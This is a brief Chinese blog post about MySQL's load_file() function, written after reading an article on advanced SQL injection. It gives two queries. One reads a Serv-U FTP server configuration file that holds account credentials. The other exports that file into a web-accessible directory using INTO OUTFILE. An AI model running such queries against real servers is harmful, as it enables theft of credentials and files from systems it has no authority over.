看了angel的《Advanced SQL Injection with MySQL》(http://www.4ngel.net/)
里面所使用的load_file()函数确实好用
在phpmyadmin中试了一下,确实可以
不过直接查询只能显示文件头的一小段
需要导出为文件才能看到完整文件
- select load_file(”e:/Program Files/Serv-U/ServUDaemon.ini”)
- select load_file(”e:/Program Files/Serv-U/ServUDaemon.ini”) from table_name into outfile “g:/wwwroot/upload/index.php.bak3″
要导出文件,则 from table_name不可缺!
0 Responses to “mysql中的load_file()函数”
Leave a Reply